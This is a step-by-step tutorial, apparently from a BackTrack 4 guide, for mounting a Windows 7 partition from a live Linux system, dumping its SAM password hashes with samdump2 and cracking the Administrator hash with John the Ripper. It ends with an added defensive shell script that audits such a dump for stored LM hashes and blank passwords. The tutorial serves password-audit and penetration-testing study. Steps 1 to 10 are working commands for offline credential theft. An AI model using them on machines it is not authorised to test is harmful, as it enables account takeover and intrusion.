1. Boot the system with BackTrack 4 and wait for the operating system to load. Use the "startx" command to start the desktop.
2. Open the Konsole and run "fdisk -l" to list the details of your partitions. Devices named sda are SATA disks and devices named hda are IDE disks.
3. Create a mount point directory, for example:
"mkdir /mnt/sda2"
4. Mount the Windows partition on that directory:
"mount -t ntfs /dev/sda2 /mnt/sda2"
where /dev/sda2 is your Windows 7 operating system partition.
5. Change to the directory containing the "SAM" file, where the Windows password hashes are stored:
"cd /mnt/sda2/Windows/System32/config"
6. Use the tool "samdump2" to dump the hashes from the SAM file (it also reads the SYSTEM hive in the same directory) into the file "pass1":
"samdump2 system sam > /root/pass1"
7. Use the "grep" command to find the Administrator hash line in that file and write it to another file, "pass2":
"cat /root/pass1 | grep Administrator > /root/pass2"
8. Change to the John the Ripper directory /pentest/passwords/jtr:
"cd /pentest/passwords/jtr"
9. Run ./john without arguments to see the supported hash formats and the various cracking options.
10. Windows stores these as NT (NTLM) hashes, so use the following command to crack the file:
"./john --format=NT /root/pass2"
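The dump produced in step 6 is in the user:rid:lmhash:nthash::: format, and an administrator auditing their own machine wants to know two things from it before anyone reaches step 10: whether any account still has an LM hash stored (LM hashes are trivially reversible and should be disabled with the NoLMHash policy) and whether any account has a blank password. This added audit script is not part of the original tutorial; the function name audit_dump and the sample dump are constructed, and only the two "empty password" hash constants are real, well-known values.

```shell
#!/bin/sh
# Added example (not from the original tutorial): audit a samdump2 / pwdump-style
# dump for weak-storage conditions a defender should remediate.
# Well-known constants: the LM and NT hashes of the empty password.
EMPTY_LM="aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT="31d6cfe0d16ae931b73c59d7e0c089c0"

# audit_dump: reads user:rid:lmhash:nthash::: lines on stdin and prints one
# finding per line: "<user> LM_STORED" when a real LM hash is present (LM
# storage still enabled for that account) and "<user> BLANK_PASSWORD" when
# the NT hash is the hash of the empty password.
audit_dump() {
    awk -F: -v elm="$EMPTY_LM" -v ent="$EMPTY_NT" '
        NF >= 4 {
            user = $1; lm = tolower($3); nt = tolower($4)
            if (lm != "" && lm != elm) print user " LM_STORED"
            if (nt == ent) print user " BLANK_PASSWORD"
        }'
}

# Constructed sample dump (hypothetical accounts; the alice/bob hashes are
# made-up hex, not real hashes from any system). The built-in Administrator
# and Guest accounts on Windows 7 are disabled with a blank password by default.
SAMPLE_DUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1000:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::'

# Run it over the sample; on a real dump use: audit_dump < /root/pass1
printf '%s\n' "$SAMPLE_DUMP" | audit_dump
```

Any account reported as LM_STORED or BLANK_PASSWORD is a finding in its own right, regardless of whether step 10 ever recovers the password.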